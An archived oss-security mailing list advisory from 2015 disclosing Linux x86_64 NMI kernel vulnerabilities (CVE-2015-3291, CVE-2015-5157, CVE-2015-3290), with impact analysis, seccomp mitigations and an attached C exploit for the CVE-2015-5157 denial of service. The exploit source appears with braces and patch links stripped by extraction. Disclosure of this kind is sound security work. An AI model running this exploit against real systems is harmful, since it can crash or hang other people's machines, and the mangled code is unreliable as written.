Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 22 Jul 2015 11:12:00 -0700
From: Andy Lutomirski <>
To: oss security list <>, 
	"" <>
Subject: Linux x86_64 NMI security issues

x86 has a woefully poorly designed NMI mechanism.  Linux uses it for
profiling.  The tricks that keep NMIs from nesting improperly are
complicated, as are the tricks that try to handle things like NMI
watchdogs and physical buttons without proper status registers.  On
x86_64 it's particularly bad due to a nasty interaction with SYSCALL.

Perhaps unsurprisingly, the implementation was incorrect in a few corner cases.

+++++ CVE-2015-3291 +++++

Malicious user code can cause some fraction of NMIs to be ignored.
(Off the top of my head, it might work 25% of the time.)  This happens
when user code points RSP to the kernel's NMI stack and executes
SYSCALL.  An NMI that occurs before the kernel updates RSP or that
occurs between when the kernel restores RSP and executes SYSRET will
take the wrong code path through the NMI handler and be ignored.

This has probably existed since Linux 3.3.  The impact is extremely
low.  Fixed by:

+++++ CVE-2015-5157 +++++

Petr Matousek and I discovered that an NMI that interrupts userspace
and encounters an IRET fault is incorrectly handled.  Symptoms range
from an OOPS to possible corruption or privilege escalation.  I
haven't verified how much corruption is possible or on what kernel
versions it occurs.  Some form of crash is likely in principle since
3.3, and it can be triggered by the attached exploit on 3.13 or newer,
I believe.

On kernels that are patched for BadIRET and have a fixup_bad_iret
function (which should be most kernels that are keeping up with
low-level security issues), there are two cases.

Case 1a (more up-to-date kernels where INTERRUPT_RETURN is "jmp
irq_return"): fixup_bad_iret will be invoked and will attempt to
recover.  There's a narrow window in which a new NMI will cause
corruption, in which case all bets are off.  That could hang, crash,
or possibly be exploited for privilege escalation.

Case 1b (less up-to-date kernels where INTERRUPT_RETURN is "iretq"):
The kernel will try to OOPS due to a bad kernel fault, except that the
OOPS will be processed with the wrong gsbase.  This is basically the
BadIRET condition, and is probably exploitable using similar
techniques to BadIRET.

Case 2 (kernels that are not patched for BadIRET): I didn't analyze
it.  BadIRET is a much worse vulnerability and you should fix it.  If
you have just the minimal BadIRET fix but not fixup_bad_iret, the
impact is probably similar to Case 1a except that the window for
corruption is much larger.

On some of these kernels, it can take quite a while for the exploit to
do anything.

Mitigations: Use seccomp to disable perf_event_open or modify_ldt or
run with only a single CPU.  To my knowledge, this cannot be exploited
on single-processor systems or in single-threaded applications.

Fixed by:

Alternatively worked around by:

although the latter patch is incompatible with Xen.

+++++ NMI bug, no CVE assigned +++++

On a kernel with the first of the two patches above but not the
second, the attached CVE-2015-5157 exploit can cause severe log spam.

I don't think this fundamentally depends on the first of the patches,
but I haven't been able to reproduce it without that patch.  On the
other hand, I haven't tried that hard.

+++++ CVE-2015-3290 +++++

High impact NMI bug on x86_64 systems 3.13 and newer, embargoed.  Also fixed by:

The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.

You can mitigate CVE-2015-3290 by blocking modify_ldt or
perf_event_open using seccomp.  A fully-functional, portable, reliable
exploit is privately available and will be published in a week or two.
*Patch your systems*

Note: Several of these fixes each depend on a few patches immediately
before them.  The NMI stack switching fix also depends on changes made
in 4.2 and will appear to apply but crash on older kernels.  I have a
different variant that's more portable.

Andy Lutomirski
AMA Capital Management, LLC

 * Copyright (c) 2015 Andrew Lutomirski
 * GPL v2
 * Exploit for CVE-2015-5157, a denial of service.
 * Build with:
 *   gcc -m32 -O2 -o CVE-2015-5157 CVE-2015-5157.c -pthread
 * Run it and follow directions.

#define _GNU_SOURCE

#include <sys/time.h>
#include <time.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/signal.h>
#include <sys/ucontext.h>
#include <asm/ldt.h>
#include <err.h>
#include <setjmp.h>
#include <pthread.h>
#include <linux/futex.h>
#include <errno.h>

static void set_cs(unsigned short cs)
#ifdef __x86_64__
	asm volatile (
		"   pushq	%0		\n\t"
		"   call	1f		\n\t"
		"1: addq	$2f-1b, (%%rsp)	\n\t"
		"   lretq			\n\t"
		: : "r" (cs));
	asm volatile (
		"   pushl	%0		\n\t"
		"   call	1f		\n\t"
		"1: addl	$2f-1b, (%%esp)	\n\t"
		"   lretl			\n\t"
		: : "r" ((unsigned int)cs));

static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *),
		       int flags)
	struct sigaction sa;
	memset(&sa, 0, sizeof(sa));
	sa.sa_sigaction = handler;
	sa.sa_flags = SA_SIGINFO | flags;
	if (sigaction(sig, &sa, 0))
		err(1, "sigaction");


static void set_ldt(void)
	const struct user_desc desc = {
		.entry_number    = 0,
		.base_addr       = 0,
		.limit           = 0xfffff,
		.seg_32bit       = 1,
		.contents        = 2, /* Code, not conforming */
		.read_exec_only  = 0,
		.limit_in_pages  = 1,
		.seg_not_present = 0,
		.useable         = 0

	if (syscall(SYS_modify_ldt, 1, &desc, sizeof(desc)) != 0)
		err(1, "modify_ldt");

static void clear_ldt(void)
	const struct user_desc desc = {};
	if (syscall(SYS_modify_ldt, 1, &desc, sizeof(desc)) != 0)
		err(1, "modify_ldt");

static jmp_buf jmpbuf;
static volatile unsigned int ftx;

static void sigsegv(int sig, siginfo_t *info, void *ctx_void)
	if (ftx == 1) {
		printf("Unexpected SEGV\n");

	siglongjmp(jmpbuf, 1);

static void *threadproc(void *ctx)
	cpu_set_t cpuset;
	CPU_SET(1, &cpuset);
	if (sched_setaffinity(0, sizeof(cpuset), &cpuset) != 0) {
		if (errno == EINVAL)
			errx(1, "Failed to bind to CPU 1 -- make sure you have at least two CPUs\n");
		err(1, "sched_setaffinity to CPU 1");

	while (1) {
		syscall(SYS_futex, &ftx, FUTEX_WAIT, 0, NULL, NULL, 0);
		while (ftx != 2)
		ftx = 0;

int main(int argc, char **argv)
	pthread_t thread;

	printf("This test runs forever.  Press Ctrl-C if you get bored.\n"
	       "If nothing happens, then either your kernel is okay\n"
	       "or you didn't abuse perf appropriately.\n"
	       "Run me under heavy perf load.  For example:\n"
	       "perf record -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]);

	if (pthread_create(&thread, 0, threadproc, 0) != 0)
		err(1, "pthread_create");

	cpu_set_t cpuset;
	CPU_SET(0, &cpuset);
	if (sched_setaffinity(0, sizeof(cpuset), &cpuset) != 0)
		err(1, "sched_setaffinity to CPU 0");

	sethandler(SIGSEGV, sigsegv, 0);
	sigsetjmp(jmpbuf, 1);
	while (ftx != 0)

#ifdef __x86_64__
// We can't add a 64-bit code segment to the LDT
#error Build as 32-bit

	ftx = 1;
	syscall(SYS_futex, &ftx, FUTEX_WAKE, 0, NULL, NULL, 0);


	ftx = 2;

	while (1)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ